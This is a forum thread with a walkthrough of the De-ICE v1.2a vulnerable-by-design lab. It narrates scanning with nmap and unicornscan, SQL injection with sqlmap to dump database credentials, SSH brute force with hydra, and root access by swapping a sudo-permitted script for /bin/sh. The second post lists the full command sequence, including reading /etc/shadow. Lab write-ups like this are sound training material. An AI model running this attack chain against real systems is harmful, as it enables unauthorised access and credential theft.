Results 1 to 2 of 2

Thread: [Video] v1.2a (1.20a) {Level 1-Disk 3-Version A}

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010

    Lightbulb [Video] v1.2a (1.20a) {Level 1-Disk 3-Version A}

    Watch video on-line:
    Download video:

    Brief Overview
    De-ICE has another challenge in its "vulnerable-by-design" series - even though the naming gets more confusing with every release! It's been a while since the last release, level 2-disk 1 (back in 2007). The students of "HackingDojo" were challenged to put together their own exploitable LiveCD, and it was released under the de-ice name. This is "version a", and should be not confused with "version B" (de-ice-1.120-1.0b.iso aka Level 1-Disk 3-Release 1-Version B), as these are NOT the same challenge - it's a different setup. release's (in date order):


    • Pre-setup (configured IP as the host has a static IP in range)
    • Scan network for the host (nmap)
    • Port scanned host (unicornscan)
    • Enumerated running services running open ports (nmap)
    • Discovered a SQL Injection (Firefox)
    • Dump all usernames & passwords to the database (sqlmap)
    • Tested for any repeated logins with known usernames & working passwords (hydra)
    • Escalated privilege by incorrectly configured settings (sudo)

    What do I need?

    A quick "ping" scan with nmap, shows which hosts are connected to the network. Once the target had been discovered a detailed port scan (TCP & UDP) was taken by using unicornscan. To check the results another detailed TCP port scan was done, though this time it was done using nmap. Unicornscan uses a lot less time to do a port scan compared to nmap (especially with UDP scanning). However, nmap has the advantage of being able to do more than just "port scanning" by "information gathering". The attacker uses the "-a" option, which allows for "OS detection", "version detection of services", "a collection of script scanning", and "traceroute details" as well as increasing the scan speed by "-T4". nmap also confirms TCP port 80 is open, which is the default port for a web server, as well as detecting basic information regarding the configuration of the server.

    The attacker then interacts with the web server and is presented with a "Data Entry" site. There isn't any protection on the server, which allows for the attacker to add a new product into the system. Upon doing so, the attacker notices the URI of the current page, "products.php?id=1". By using the ID variable, the server selects the requested item. The attacker tries to inject their own code allowed with it.

    The attacker uses sqlmap to speed up the injection process as it is designed to test multiple injection methods. sqlmap has pre-built commands which allows the attacker to find common sensitive information (such as; the running services and versions, current user and the database admin, user privileges as well as viewing every table along with the contents). The attacker chooses to capture all the users and their passwords to the database services. The passwords used in the database are encrypted, however, they use a well-known scheme which is easily cracked. The result of this, gives the attacker 50 working usernames as well as 49 known passwords too.

    The attacker then checks to see if any of the users have reused their passwords (or if they have used someone else known password, any blank passwords or their usernames as the passwords), by brute forcing the SSH remote login. The result of this action, gives the attacker remote access to the system with 50 credentials.

    On the list of credentials, the attacker notices a few usernames which they have seen before from previous pentests for the company. The attacker then logs into their accounts and views their personal folders. Upon accessing "ccoffee" account, there was a directory (scripts) located inside. In this folder, there was a file which was only accessible to the super user account, root. The attacker then checks to see if any privileges have been assigned to the user for this file-they have been. The attacker then backups the file and replaces it with their own file - which is a shell prompt.

    The attacker highlights the fact that the full path has to be specified for sudo to allow access to the file. After this command has been executed, the attacker now has complete access to the system. The attacker collects a bit of information about the system (IP addresses, user hashes and accesses the personal folder for the root account).

    As the attacker now has access to the complete system, they access every user folder at once and view random files at their choosing; a selection of them are sensitive to the company. (Note: I skipped the majority of them out for two reasons: 1.) It's boring watching me cat'ing them all and 2.) It allows you to view them for yourselves).

    Game over
    Last edited by g0tmi1k; 08-12-2011 at 11:25 AM.
    Have you...g0tmi1k?

  2. #2
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010

    Default Re: [Video] v1.2a (1.20a) {Level 1-Disk 3-Version A}

    ifconfig eth0
    ifconfig eth0
    ifconfig eth0
    nmap 192.168.1.* -n -sn -sP
    us -H -msf -Iv -p 1-65535 && us -H -mU -Iv -p 1-65535
    nmap -p 1-65535 -T4 -A -v
    firefox    # Add new product -> view product
    cd /pentest/database/sqlmap
    ./ -u "" -f -b --current-user --is-dba --is-dba --privileges --dbs --dump
    ./ -u "" --users --passwords
    cd output/
    grep -i administrator log
    grep -i localhost log | grep -v : | sort | uniq
    grep -i localhost log | grep -v : | sort | uniq | sed "s/\[\*\] '//" | sed  "s/'@'localhost'//" > /tmp/users
    grep "clear-text" log | sort | uniq
    grep "clear-text" log | sort | uniq | sed "s/    clear-text password: //" > /tmp/passwords
    wc -l /tmp/users
    hydra -L /tmp/users -P /tmp/passwords -e ns ssh 2>/dev/null | tee /tmp/output
    #medusa -h -U /tmp/users -P /tmp/passwords -O /tmp/output -e ns -M ssh
    ssh ccoffee@
    cd scripts
    ls -lah
    sudo -l
    mv getlogs.bkup
    echo "/bin/sh" >
    chmod +x
    ls -l
    sudo /home/ccoffee/scripts/
    id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lah /root/
    ls -lAhR /home
    #cat /home/aallen/gravy.txt
    cat /home/aspears/hbkae
    cat /home/bbanter/notes
    cat /home/cchisholm/reminders.text
    cat /home/ccoffee/DONOTFORGET
    #cat /home/hlovell/creepy.doc
    cat /home/jalvarez/draft
    cat /home/jdavenport/company_address.txt
    #cat /home/jdavenport/svrc.txt
    cat /home/jduff/todo.txt
    #cat /home/krenfro/list
    cat /home/ktso/personnel.doc
    #cat /home/kwebber/list
    #cat /home/lmartinez/favorite.txt
    #cat /home/mnader/layout
    cat /home/rpatel/schedule

    • v1.2a has a static IP address of Make sure you are on the same subnet as it!
    • When booting De-ICE it will randomly assign the passwords to the usernames - so it's different each time!
    • Each time you start v1.2a it will generate fresh SSH keys - so it's different each time!
    • I made a couple of mistakes in the video (For example: /devnull) - it's worth checking the commands subsection!

    Song: Crazy World (Extended Mix) - J Majik & Wickaman & Ill Behaviour - Danny Byrd Featuring I-Kay
    Video length: 07:40
    Capture length: 29:31
    Blog Post: g0tmi1k: [Video] v1.2a (1.20a) {Level 1 - Disk 3 - Version A}
    Forum Post:;p=2388#p2388 &[video]-de-ice-net-v1-2a-1-20a-{level-1-disk-3-version-}.html#post204394

    Last edited by g0tmi1k; 08-09-2011 at 09:27 AM.
    Have you...g0tmi1k?

Similar Threads

  1. [Video] v1.0 (1.110) {Level 1 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 9
    Last Post: 03-06-2011, 11:38 PM
  2. [Video] v1.1 (1.100) {Level 1 - Disk 2}
    By g0tmi1k in forum BackTrack Videos
    Replies: 7
    Last Post: 08-20-2010, 10:00 AM
  3. [Video] Complete Network - v2.0 (1.110) {Level 2-Disk 1}
    By imported_g0tmi1k in forum OLD BackTrack 4 Howto
    Replies: 2
    Last Post: 03-08-2010, 09:42 AM
  4. [Video] v2.0 (1.100) {Level 2 - Disk 1}
    By g0tmi1k in forum BackTrack Videos
    Replies: 0
    Last Post: 02-25-2010, 11:08 AM
  5. [Video] Complete Network - v1.0 (1.110) {Level 1-Disk 1}
    By imported_g0tmi1k in forum OLD BackTrack 4 Howto
    Replies: 0
    Last Post: 02-13-2010, 09:08 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts